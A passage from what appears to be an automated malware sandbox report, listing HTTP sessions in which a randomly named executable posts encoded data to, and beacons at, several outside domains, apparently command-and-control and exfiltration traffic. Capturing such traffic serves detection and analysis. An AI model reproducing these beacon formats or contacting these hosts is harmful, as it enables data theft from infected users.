                                                                                                      Origin: http://www.urssaf.pro
                                                                                                      Referer: http://www.urssaf.pro/z0cc/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 72 4e 61 49 35 33 32 42 38 46 67 36 34 6f 74 75 70 55 78 6b 45 43 46 7a 71 4d 78 36 62 74 49 32 54 53 76 4d 62 68 6d 53 69 5a 68 7a 47 78 65 67 57 66 55 37 34 6c 56 38 4a 47 6d 4c 65 49 6f 6b 55 4d 4e 71 30 4e 59 50 61 38 30 74 66 78 4a 56 44 77 61 4e 6e 6a 39 38 68 4c 41 6a 47 4d 4e 34 2f 5a 65 51 2f 71 43 7a 37 52 72 4a 79 72 54 32 46 63 36 6c 39 67 7a 5a 44 68 4c 79 51 54 6e 58 4e 45 34 64 4a 61 7a 47 47 75 75 4f 61 32 4a 31 56 49 71 55 6a 4a 41 45 43 70 4b 78 53 33 4c 6e 68 6e 75 4c 6a 4b 30 67 6b 38 50 4f 4e 4c 72 63 77 77 74 39 38 2f 50 36 4f 30 67 38 5a 51 6d 67 75 52 65 58 33 35 37 78 4b 50 33 53 31 45 64 73 46 77 78 6a 65 63 67 6c 34 34 69 44 35 6d 30 63 2f 46 46 68 56 52 41 72 76 38 32 53 4a 6e 50 33 33 6e 55 4b 70 58 70 37 5a 39 73 4f 34 32 61 61 6e 61 6a 61 33 70 72 62 74 77 75 38 76 38 73 43 58 4e 39 48 6b 36 61 37 7a 43 62 67 2f 6b 68 66 54 70 38 4c 42 66 71 70 39 74 67 50 78 63 71 6c 57 4b 50 45 43 75 4a 31 77 62 46 31 33 79 37 4d 74 74 76 53 36 2f 66 7a 55 36 50 30 55 4b [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=rNaI532B8Fg64otupUxkECFzqMx6btI2TSvMbhmSiZhzGxegWfU74lV8JGmLeIokUMNq0NYPa80tfxJVDwaNnj98hLAjGMN4/ZeQ/qCz7RrJyrT2Fc6l9gzZDhLyQTnXNE4dJazGGuuOa2J1VIqUjJAECpKxS3LnhnuLjK0gk8PONLrcwwt98/P6O0g8ZQmguReX357xKP3S1EdsFwxjecgl44iD5m0c/FFhVRArv82SJnP33nUKpXp7Z9sO42aanaja3prbtwu8v8sCXN9Hk6a7zCbg/khfTp8LBfqp9tgPxcqlWKPECuJ1wbF13y7MttvS6/fzU6P0UKkQkRrpQVntT5sdhBnXjIBmHIkQbzK7HlkKXTt2dd6/fvBRGofyZtMD3ddMdJRpkeWBb0TWaaTs13rm+1AV1wz+4DH48v3cwH2FvtBgk9q46o9drAwp5j+q16akfve2clsehPfwq63Z/Q9DZ1AxwJrN22zuaDmMa3IqZioDnInWZnvShC0G7nreyRIUuj3KbL/MZpjtacsWAc3/JA3DFerNVtrHQHa+qhEUCMYnLtIOcIJYO2AUe/ayiDCVT1mSvL5J7b83opAp3hZ3gjFDqr0Vj/i3falMtd87dePgnZrgPlnw3aLPXgzj8SgzG4XTbm77TApotXXBecDkm+UEzGoLtGaI4u0oi3to/CztxMyui7ieo9Q1GWt0ZWyTatRYCtwxeOMxig1BScdtbXRYXKbOV3PBpxXLh/eRYxsHX6G5ThrRZ/twony0QGzW2taTZtsjeZ9uc2YAk24892DpscE3YOtuYW9oe7BBPiy+TnKswcULzcCLrbqXtfN8h7aADCC6DoGOAnALp25p2pZ+337WdaNAcw5QtXttHPpMTnTUCS/FTLD4MO/szx3mUHWDolPb/6sD2nQxvVaQZ8VIflJ43/YbhX/wMtlN8IVjVXFyWhdTpCkc7aTXtPuVNmMkc3MbLQFBq3sgVcxDzYYazNDR+EDnIYYaFbXu [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.54999475.2.103.23801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:46.388480902 CET483OUTGET /z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.urssaf.pro
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:54:47.012469053 CET404INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:54:46 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 56 68 3d 6d 50 79 6f 36 44 2b 77 78 53 67 36 77 71 64 56 39 6e 6b 2f 4f 53 59 71 68 4d 39 34 4c 70 55 79 54 43 71 52 52 69 6a 2f 6b 61 70 6d 4f 51 2b 4c 61 75 6b 55 68 6e 4a 71 42 45 66 52 4d 2f 6f 32 43 4c 31 33 36 72 77 33 51 63 63 72 44 42 73 6d 4d 57 4b 58 67 41 6b 4c 75 70 45 63 44 74 5a 36 35 38 69 64 38 61 69 67 37 45 72 49 2f 4c 66 41 46 76 53 7a 34 48 53 58 46 7a 76 48 61 54 48 48 57 41 3d 3d 26 47 4c 76 4c 3d 69 36 49 4c 53 74 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.5499953.33.130.190801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:52.064824104 CET755OUTPOST /pd34/ HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.livelovechat.live
                                                                                                      Referer: http://www.livelovechat.live/pd34/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 48 35 30 62 46 7a 41 39 69 7a 59 4c 41 57 32 59 6e 73 69 38 32 54 54 4b 56 35 64 76 6f 6b 39 77 69 49 52 49 64 46 4d 69 69 42 66 72 71 56 41 2b 71 51 63 7a 5a 54 33 37 55 47 4e 6d 77 5a 75 35 42 4f 46 6b 44 6a 77 54 47 62 37 33 2b 67 65 76 45 53 43 34 31 4a 42 67 4b 4e 69 62 74 59 51 4e 30 6a 42 6f 64 69 47 74 77 41 38 4e 53 6b 72 35 77 51 36 39 57 33 76 67 64 35 57 48 52 52 77 67 4d 71 57 68 44 74 79 41 47 73 57 33 4e 6b 4c 62 6c 34 75 7a 31 4e 72 78 45 2f 46 68 45 5a 4c 51 67 74 45 73 37 44 64 2b 41 31 34 6e 4f 39 37 64 65 2b 71 6e 4a 36 73 53 49 69 53 30 41 74 4a 6e 6f 37 5a 46 53 57 77 3d
                                                                                                      Data Ascii: 3Vh=H50bFzA9izYLAW2Ynsi82TTKV5dvok9wiIRIdFMiiBfrqVA+qQczZT37UGNmwZu5BOFkDjwTGb73+gevESC41JBgKNibtYQN0jBodiGtwA8NSkr5wQ69W3vgd5WHRRwgMqWhDtyAGsW3NkLbl4uz1NrxE/FhEZLQgtEs7Dd+A14nO97de+qnJ6sSIiS0AtJno7ZFSWw=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.5499963.33.130.190801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:54.616808891 CET775OUTPOST /pd34/ HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.livelovechat.live
                                                                                                      Referer: http://www.livelovechat.live/pd34/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 48 35 30 62 46 7a 41 39 69 7a 59 4c 42 31 75 59 67 4c 2b 38 7a 7a 54 46 51 35 64 76 68 45 39 72 69 49 4e 49 64 45 49 4d 69 7a 37 72 70 33 59 2b 70 55 77 7a 59 54 33 37 62 6d 4e 6a 75 70 76 55 42 4f 34 54 44 6a 38 54 47 62 76 33 2b 68 75 76 46 68 71 37 36 35 42 69 4c 39 69 5a 7a 6f 51 4e 30 6a 42 6f 64 69 53 58 77 41 6b 4e 54 56 62 35 77 31 4f 36 62 58 76 6a 4b 4a 57 48 61 78 77 6b 4d 71 57 54 44 70 7a 6c 47 76 75 33 4e 68 76 62 6c 4e 53 30 36 4e 72 7a 5a 76 46 79 44 73 36 4a 6c 64 78 6d 37 43 55 74 65 6b 59 68 47 72 4b 33 45 63 69 50 61 61 41 71 59 78 61 44 52 64 6f 4f 79 59 4a 31 4d 42 6e 46 2b 53 6c 74 33 68 37 76 61 55 54 56 64 67 47 48 57 6c 67 52
                                                                                                      Data Ascii: 3Vh=H50bFzA9izYLB1uYgL+8zzTFQ5dvhE9riINIdEIMiz7rp3Y+pUwzYT37bmNjupvUBO4TDj8TGbv3+huvFhq765BiL9iZzoQN0jBodiSXwAkNTVb5w1O6bXvjKJWHaxwkMqWTDpzlGvu3NhvblNS06NrzZvFyDs6Jldxm7CUtekYhGrK3EciPaaAqYxaDRdoOyYJ1MBnF+Slt3h7vaUTVdgGHWlgR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.5499973.33.130.190801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:57.172456980 CET1792OUTPOST /pd34/ HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.livelovechat.live
                                                                                                      Referer: http://www.livelovechat.live/pd34/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 48 35 30 62 46 7a 41 39 69 7a 59 4c 42 31 75 59 67 4c 2b 38 7a 7a 54 46 51 35 64 76 68 45 39 72 69 49 4e 49 64 45 49 4d 69 7a 7a 72 70 43 4d 2b 70 7a 6b 7a 62 54 33 37 46 57 4e 69 75 70 75 57 42 4f 51 66 44 6a 42 6f 47 65 72 33 2f 47 47 76 43 51 71 37 74 4a 42 69 4f 4e 69 55 74 59 51 63 30 6e 74 53 64 69 43 58 77 41 6b 4e 54 57 44 35 32 67 36 36 49 48 76 67 64 35 57 4c 52 52 77 63 4d 71 4f 44 44 70 6e 62 48 66 4f 33 4d 48 50 62 32 4c 47 30 6c 39 72 31 61 76 45 76 44 73 2b 73 6c 64 63 66 37 43 68 32 65 6a 73 68 58 76 54 4f 66 49 57 48 4d 61 64 47 63 69 61 47 42 36 73 65 33 35 5a 61 4e 6a 6e 33 33 53 4a 48 68 52 48 44 54 41 61 45 4d 33 32 6f 64 78 45 61 41 41 65 32 39 35 49 68 6c 56 34 67 56 30 46 50 55 53 63 32 59 66 74 4c 63 2b 6f 4c 38 32 32 79 6f 4b 6d 6d 31 73 54 73 67 4f 49 44 2f 52 71 77 4c 4e 59 4a 38 30 53 46 71 72 69 4b 2b 42 41 32 34 57 78 36 56 33 46 58 55 35 49 42 70 5a 65 46 52 54 78 42 56 7a 55 65 46 75 31 42 2f 57 68 66 32 38 4a 46 2b 37 79 52 6f 79 73 68 70 55 6b 47 72 68 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=H50bFzA9izYLB1uYgL+8zzTFQ5dvhE9riINIdEIMizzrpCM+pzkzbT37FWNiupuWBOQfDjBoGer3/GGvCQq7tJBiONiUtYQc0ntSdiCXwAkNTWD52g66IHvgd5WLRRwcMqODDpnbHfO3MHPb2LG0l9r1avEvDs+sldcf7Ch2ejshXvTOfIWHMadGciaGB6se35ZaNjn33SJHhRHDTAaEM32odxEaAAe295IhlV4gV0FPUSc2YftLc+oL822yoKmm1sTsgOID/RqwLNYJ80SFqriK+BA24Wx6V3FXU5IBpZeFRTxBVzUeFu1B/Whf28JF+7yRoyshpUkGrhoohMLEWPv/DScG1dc7U5tO/L72JsYFB4dUYh5nvxaOgAeqw6IK9fbU4xngAi9p8FSMHB9wnGKsgsL9dJIm0mb8theSlzxfbj77QGb9kjTTZsbuWeg+JQNgp/mPyaWWQjEsb20Hp8VnizuisbI6+hyi7MA4uZqUegpl8iu/+aNR7V0SkcEGhb6CrdPGl8uczXNGzAUUvT+pnblONnIZaV9d/YvjvwzZ9ArOEWePjKDFZKLZdlzTMww2q8d9N6AmOtHvjxzg2wn/YiN/J1rSvForaoayS5T0UMZtjurJno4mOKxvppWxKWPWz81UCRvENbR1powYnTq2n1heYx8bluWeH+rbM88QZRtSJbI4Lm1XnhEOyRWij2mniQtc3wNUHRzyfRiIsZA+efB6xGb38/G6A7NVPNuKV99mIMDhUjbR6pwtGw/e6oifoKN7oubKeIl47KvQP/acr5o40SrMfrEsO7U17zSYXfkheqg1xoDh3Ys07WXhD7xcfmR73tW11vbyWElwH/kaMNigC+bhtP+Br40bsZbRN+rWcWMeq9YV0aVo1ioPSoFgJ0TKFhNOp/hz99Pcq5YcHVnKRV48T1AFNqLtI6pw1rOkJ4JZ8ayElA2TvIp0NKymIKN+jG3WQ7fl7Ak0o7RkFnd/xW6/QN2thOFVoWal9utG [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.5499983.33.130.190801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:54:59.718556881 CET490OUTGET /pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg== HTTP/1.1
                                                                                                      Host: www.livelovechat.live
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:00.342716932 CET404INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 18 Nov 2024 12:55:00 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 264
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 4c 76 4c 3d 69 36 49 4c 53 74 70 26 33 56 68 3d 4b 37 63 37 47 47 34 59 6f 42 68 79 49 48 32 46 6b 5a 76 34 37 6a 76 79 58 49 51 75 37 42 46 33 67 72 39 6e 66 6b 39 62 73 68 69 4a 73 47 45 57 72 77 51 7a 4f 52 54 72 64 6e 63 67 67 66 65 7a 43 59 42 7a 61 6d 4e 43 44 62 44 47 76 79 37 64 4b 30 57 67 33 73 38 76 4e 76 36 72 74 72 38 53 38 69 46 71 53 44 6d 42 2b 51 6b 71 51 48 62 6b 33 31 47 77 54 46 6d 79 64 70 4b 46 61 79 78 72 49 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg=="}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.549999203.161.49.193801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:05.421433926 CET752OUTPOST /tv3i/ HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.inspires.website
                                                                                                      Referer: http://www.inspires.website/tv3i/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 6c 79 43 74 69 6b 76 44 67 37 77 30 62 76 66 73 4b 74 39 78 64 6d 72 58 37 46 31 67 46 6f 36 52 67 73 42 2f 75 5a 67 65 62 72 51 7a 66 63 6f 71 67 59 53 4f 4f 49 77 70 6b 52 53 51 6f 39 78 68 4f 34 49 49 42 30 36 77 6b 64 6e 65 39 32 62 4d 4b 34 39 58 6f 41 58 57 36 70 49 62 4f 58 6c 71 76 34 50 38 41 4a 71 71 71 6b 74 47 69 6e 47 52 70 7a 2b 4a 6d 39 42 67 46 55 52 36 55 47 6e 5a 62 59 65 44 72 2b 4d 44 2b 6e 32 63 6b 77 63 2b 5a 73 43 31 70 6c 75 39 77 64 69 5a 50 77 74 37 64 61 78 34 44 42 2b 4f 77 62 4c 6a 35 42 59 45 78 59 43 69 57 49 4d 47 53 72 39 54 36 6a 38 39 78 67 6f 42 46 6f 55 3d
                                                                                                      Data Ascii: 3Vh=lyCtikvDg7w0bvfsKt9xdmrX7F1gFo6RgsB/uZgebrQzfcoqgYSOOIwpkRSQo9xhO4IIB06wkdne92bMK49XoAXW6pIbOXlqv4P8AJqqqktGinGRpz+Jm9BgFUR6UGnZbYeDr+MD+n2ckwc+ZsC1plu9wdiZPwt7dax4DB+OwbLj5BYExYCiWIMGSr9T6j89xgoBFoU=
                                                                                                      Nov 18, 2024 13:55:06.129165888 CET533INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:06 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.550000203.161.49.193801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:07.971286058 CET772OUTPOST /tv3i/ HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.inspires.website
                                                                                                      Referer: http://www.inspires.website/tv3i/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 6c 79 43 74 69 6b 76 44 67 37 77 30 4a 63 48 73 4c 4c 31 78 59 47 71 6c 6e 56 31 67 4d 49 37 35 67 73 46 2f 75 62 51 4f 61 59 6b 7a 66 2b 41 71 6e 61 32 4f 50 49 77 70 38 68 53 52 72 4e 78 71 4f 34 55 71 42 78 61 77 6b 64 7a 65 39 7a 2f 4d 4b 4c 6c 55 75 41 58 49 78 4a 49 56 57 33 6c 71 76 34 50 38 41 4a 2b 51 71 67 42 47 6a 55 65 52 76 52 57 4b 72 64 42 6a 55 55 52 36 5a 6d 6e 43 62 59 66 75 72 38 30 39 2b 6c 2b 63 6b 79 30 2b 5a 39 43 32 6a 6c 75 33 30 64 6a 52 4a 43 59 68 55 35 31 42 4d 79 6a 76 75 71 48 75 38 33 70 75 72 36 4b 4b 46 6f 67 2b 43 34 31 6b 72 54 64 55 72 44 34 78 62 2f 41 54 78 4d 74 43 2f 50 2f 4e 52 4e 57 7a 72 55 41 65 61 4e 64 4c
                                                                                                      Data Ascii: 3Vh=lyCtikvDg7w0JcHsLL1xYGqlnV1gMI75gsF/ubQOaYkzf+Aqna2OPIwp8hSRrNxqO4UqBxawkdze9z/MKLlUuAXIxJIVW3lqv4P8AJ+QqgBGjUeRvRWKrdBjUUR6ZmnCbYfur809+l+cky0+Z9C2jlu30djRJCYhU51BMyjvuqHu83pur6KKFog+C41krTdUrD4xb/ATxMtC/P/NRNWzrUAeaNdL
                                                                                                      Nov 18, 2024 13:55:08.683794022 CET533INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:08 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.550001203.161.49.193801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:10.517643929 CET1789OUTPOST /tv3i/ HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
